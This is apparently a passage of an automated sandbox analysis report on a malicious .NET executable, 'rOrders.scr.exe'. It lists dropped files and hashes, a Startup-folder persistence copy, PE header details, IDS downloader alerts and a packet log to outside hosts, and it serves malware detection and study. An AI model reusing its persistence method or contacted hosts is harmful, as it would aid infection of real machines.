Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07956751367070014
Encrypted:	false
SSDEEP:	3:J/setYeeCNUGkYatiGRMyJoXB+U0CX/0GYtall58Kgvvl/QoeP/ll:Jdz2GRp0zJoXBV0Cv9dz8KgR+t
MD5:	08463B1AA5648E7E6CE83336DBA6EB53
SHA1:	AB5F2D51F02E9EBB8956DF8483CC5D0668242F2F
SHA-256:	A3B2BADCF7F2A9A58FF1AA66965F337B4C9CFB4D83B105EA6757E6DA03365698
SHA-512:	4AA7B306EB96F743B61C1B186930AF3508CE5A247B1E00ED055745C847428C804BA6975D72FAC810F4ECA3955C5F1A78ABBD41634E4BE54FE2D87C6313234968
Malicious:	false
Preview:	..!.....................................;...{.......}..."...}%.........."...}..."...}%._...."...}..................2.'.."...}%.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.370059464396407
Encrypted:	false
SSDEEP:	24:3vQWWSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9tXt/NK3R8UHr2:YWWSU4y4RQmFoULF+mZ9tlNWR8Wi
MD5:	43FB623D8A60BA37C15FCA89C5765626
SHA1:	9298A9BD719B6F0F61DC245283E354156D0524F8
SHA-256:	38E97F5190AB15058EC4316BEF40F68B0126F71A3AA6377978B603DF2D6EEBA0
SHA-512:	34F2AD825627088A4976974AC9E974856072964956FD1F1A11CE6EDDDE9DD58C7A2054924D74F9981DB2140A8C8F19D429D7900CA9ACA3EDC52AA34EDA1FEDEE
Malicious:	false
Preview:	@...e.................................f..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxu3p2yk.blh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iez5e3yu.3xw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0tezrkx.nwx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yr0xxvb0.bn4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	829952
Entropy (8bit):	7.05208893531554
Encrypted:	false
SSDEEP:	12288:paMaSzOKy2r7SPN+3TzXhMlJ/AeHvC/yj0YVYdjTLdUR2:wMaSSKy2/SPNUbhve6/yyZTxU
MD5:	1FEB066E46D1BEED60404A2A6ADB3D5A
SHA1:	A8A8627B651F037647294992CEF1DC0924A6ABBB
SHA-256:	2553ADADD29AF4148BE4C10F1771573B149006815374121BB802FA7599AB06F4
SHA-512:	13ADAC6A8AAFC03608D04951F551C21A723081F800D311F4FF2061D145A6FE6A751A5FF69E42D980DDB8EF12633A846F92D3919714C8626D16D6FA61B750178F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.................. ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........$...........D...d...........................................&.(......".......".(.....Vs....(....t.........v..}.....(......(....&.(.....f.r...p.r...p.(2...(3......N.s4...}.....(.....j.(5.....(6....s....(7....N.s4...}.....(.....N.s4...}.....(......(.........N.s4...}.....(.....F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X........J.~..........(Z...F.~....(X....a...6.~.....(Y...*F.~....(X......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.05208893531554
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rOrders.scr.exe
File size:	829'952 bytes
MD5:	1feb066e46d1beed60404a2a6adb3d5a
SHA1:	a8a8627b651f037647294992cef1dc0924a6abbb
SHA256:	2553adadd29af4148be4c10f1771573b149006815374121bb802fa7599ab06f4
SHA512:	13adac6a8aafc03608d04951f551c21a723081f800d311f4ff2061d145a6fe6a751a5ff69e42d980ddb8ef12633a846f92d3919714c8626d16d6fa61b750178f
SSDEEP:	12288:paMaSzOKy2r7SPN+3TzXhMlJ/AeHvC/yj0YVYdjTLdUR2:wMaSSKy2/SPNUbhve6/yyZTxU
TLSH:	21057C453EA044F8C5318AF6E8E7823CBA71B95166E3C46625CF2E9C7CC8B5046D71AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cbe1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcbdcc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcc000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xce000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc9e24	0xca000	6a6664878531826ec8a6c828b88019c8	False	0.43772238551980197	data	7.059154850937121	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xcc000	0x586	0x600	023f933e236ce25e662698bcb26c192d	False	0.4134114583333333	data	4.009208314844858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xce000	0xc	0x200	a009008c61fd21e7ab6caf0c9762c3ce	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xcc0a0	0x2fc	data			0.43455497382198954
RT_MANIFEST	0xcc39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:31:14.236420+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-13T13:31:15.455053+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-13T13:31:16.035820+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-13T13:31:16.767599+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49710	132.226.247.73	80	TCP
2025-01-13T13:31:21.003403+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49717	104.21.32.1	443	TCP
2025-01-13T13:31:25.043406+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49723	104.21.32.1	443	TCP
2025-01-13T13:31:28.111407+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49724	132.226.247.73	80	TCP
2025-01-13T13:31:29.455148+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49724	132.226.247.73	80	TCP
2025-01-13T13:31:29.997818+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49740	104.21.32.1	443	TCP
2025-01-13T13:31:30.752069+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49741	132.226.247.73	80	TCP
2025-01-13T13:31:37.974428+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49794	104.21.32.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:31:13.284159899 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:13.289156914 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:13.289243937 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:13.289658070 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:13.294536114 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:13.977036953 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:13.982013941 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:13.986870050 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:14.193799019 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:14.236419916 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:14.242403030 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:14.242439985 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:14.243896961 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:14.248018026 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:14.248033047 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:14.716727018 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:14.716800928 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:14.724844933 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:14.724868059 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:14.725264072 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:14.767679930 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.076505899 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.123326063 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.188241005 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.188302040 CET	443	49707	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.188347101 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.195594072 CET	49707	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.199537039 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:15.204349041 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:15.412225962 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:15.415596008 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.415633917 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.415690899 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.416052103 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.416064978 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.455053091 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:15.892976046 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:15.895571947 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:15.895592928 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:16.035845995 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:16.035901070 CET	443	49708	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:16.035981894 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:16.036556959 CET	49708	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:16.040193081 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:16.041384935 CET	49710	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:16.045197964 CET	80	49704	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:16.045258999 CET	49704	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:16.046185017 CET	80	49710	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:16.046262026 CET	49710	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:16.046391964 CET	49710	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:16.051256895 CET	80	49710	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:16.719012976 CET	80	49710	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:16.721509933 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:16.721554041 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:16.721893072 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:16.722260952 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:16.722276926 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:16.767599106 CET	49710	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:17.179079056 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:17.180910110 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:17.180952072 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:17.331454039 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:17.331523895 CET	443	49711	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:17.331604004 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:17.332159996 CET	49711	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:17.336385012 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:17.341211081 CET	80	49712	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:17.343952894 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:17.344068050 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:17.348882914 CET	80	49712	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:19.045001984 CET	80	49712	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:19.046721935 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.046770096 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.046833992 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.047122002 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.047137022 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.095699072 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.524580956 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.526258945 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.526295900 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.674246073 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.674309969 CET	443	49715	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:19.674570084 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.674809933 CET	49715	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:19.677936077 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.679090023 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.682976961 CET	80	49712	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:19.683037043 CET	49712	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.683862925 CET	80	49716	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:19.683927059 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.684025049 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:19.688811064 CET	80	49716	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:20.359136105 CET	80	49716	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:20.374636889 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:20.374695063 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.375458002 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:20.383661032 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:20.383677959 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.408282995 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:20.857517004 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.859955072 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:20.859998941 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.998155117 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.998224020 CET	443	49717	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:20.998284101 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:20.998806953 CET	49717	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:21.003068924 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:21.004246950 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:21.008100986 CET	80	49716	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:21.008187056 CET	49716	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:21.009123087 CET	80	49718	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:21.009198904 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:21.009288073 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:21.014061928 CET	80	49718	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:21.862019062 CET	80	49718	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:21.863545895 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:21.863593102 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:21.863847017 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:21.864125013 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:21.864136934 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:21.908221006 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:22.321379900 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:22.323215008 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:22.323250055 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:22.466192961 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:22.466264009 CET	443	49719	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:22.466310978 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:22.466780901 CET	49719	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:22.484296083 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:22.485729933 CET	49720	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:22.489248037 CET	80	49718	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:22.489332914 CET	49718	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:22.490525961 CET	80	49720	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:22.493958950 CET	49720	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:22.494086981 CET	49720	80	192.168.2.5	132.226.247.73
